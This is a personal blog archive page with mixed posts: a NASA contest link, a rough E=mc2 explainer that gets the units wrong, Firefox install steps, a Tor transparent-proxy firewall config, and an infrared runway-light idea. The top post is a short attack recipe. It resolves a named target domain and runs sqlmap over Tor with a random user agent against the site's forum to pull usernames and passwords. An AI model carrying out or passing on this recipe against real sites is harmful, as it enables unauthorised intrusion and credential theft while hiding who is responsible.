Friday, February 5, 2016

Hacking Servers with Kali and friends - Chapter 1; Sql injection with sqlmap

look up target ip address (write the following info down);
anon@1337-817chs:~$ nslookup www.Jihadist.ps

Server:        8.8.8.8
Address:    8.8.8.8#53

Non-authoritative answer:
www.Jihadist.ps    canonical name = Jihadist.ps.
Name:    Jihadist.ps
Address: 104.28.##.105
Name:    Jihadist.ps
Address: 104.28.##.105

make sure tor is installed and running.
run sqlmap over tor with random user agent at target page for usernames and passwords;

anon@1337-817chs:~$sudo sqlmap --tor --random-agent -a --url=http://forums.Jihadist.ps

that will take awhile on to Metasploit in chapter 2

Thursday, January 21, 2016

Nasa-astrobee-robotic-arm-design-contest.


http://www.theverge.com/2016/1/19/10791678/nasa-astrobee-robotic-arm-design-contest-iss?utm_campaign=theverge&utm_content=article&utm_medium=social&utm_source=facebook

In yet another crowdsourcing effort, NASA is asking members of the public to help with the design of the Astrobee — a free-flying robot the space agency is making to live aboard the International Space Station. Specifically, NASA wants help creating a robotic arm for the Astrobee, which the robot will use to interact with the space station environment.






Closed




open






Sunday, January 17, 2016

E=mc2 in six lines.

E=mc2 in six lines.
Take the weight of an object, you then have its mass (m).
Take the speed of light 299,792 kilometers per second or (c), multiply it by the speed of light 299,792 kilometers per second, (c). This gives you (c2). 89875243264 kilometers per second. Take the mass (m) and multiply it by (c2) this gives you the amount of energy in a given object (E). E=mc2

Tuesday, December 29, 2015

Installing firefox on kali linux (Re-post from Dr Chaos's blog)

Each command in terminal. 
************************
apt-get remove iceweasel
echo -e “\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main” | tee -a /etc/apt/sources.list > /dev/null
apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
apt-get update
apt-get install firefox-mozilla-build
************************


Sunday, December 13, 2015

Tor as a Transparent Proxy on Ubuntu Linux Bulletproof config

TOR config
</etc/tor/torrc>


VirtualAddrNetworkIPv4 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 53
FascistFirewall 1
FirewallPorts 443
DataDirectory /var/lib/tor
PidFile /var/run/tor/tor.pid
User debian-tor
ClientOnly



 Firehol config
</etc/firehol/firehol.conf>


version 5

server_tor_ports="tcp/9050 tcp/9051"
client_tor_ports="default"
server_proxy_ports="tcp/9040"
lient_tor_ports="default"
server_proxy_ports="tcp/9040"
client_proxy_ports="default"
server_polipo_ports="tcp/8118"
client_polipo_ports="default"
server_dns_ports="udp/53"
client_dns_ports="default"

#all incoming DNS goes to port 53 or whatever your torrc's DNSPort is
#for local redirection make sure your /etc/resolv.conf reads 'nameserver #127.0.0.1
redirect to 53 inface eth+ proto udp src 192.168.0.0/16 dst not 127.0.0.1 dport 53


 #add to force all incoming tcp traffic to 9040
 #for some reason this will redirect locally generated tcp traffic too
transparent_proxy "1:65535" 9040 debian-tor inface eth+ user not debian-tor  dst not "$UNROUTABLE_IPS"



interface eth0 dhcp
        policy return
        client dhcp accept
        client all accept


 #allow only outgoing TOR traffic
interface eth0 internet src not "$UNROUTABLE_IPS"
        client all accept user debian-tor
       


 #add for local DNS and proxy access
interface "eth0 lo" local src "192.168.1.2 127.0.0.1" dst "192.168.1.2 127.0.0.1"
        server dns accept
        server privoxy accept
        server tor accept
        server proxy accept
       
 #add for local TOR socks and control port access
interface lo internal src 127.0.0.1 dst 127.0.0.1
        server tor accept
        server proxy accept

Tuesday, December 8, 2015

Monday, December 7, 2015

Landing in Darkness

IR Led Spheres to light up emergency runways at night. Cheap, can deploy by the thousands. Land with IR camera in Darkness.


Clear waterproof plastic spheres the size of a tennis ball with Solar Power cells leading to a main charger board then Ultracapacitor.



http://www.kr4.us/miniature-solar-cell-bpw34.html?

Miniature Solar Cells




http://www.kr4.us/sparkfun-sunny-buddy-mppt-solar-charger.html

SparkFun Sunny Buddy - MPPT Solar Charger











Φ8 16-IR LED DC 12V Illuminator Board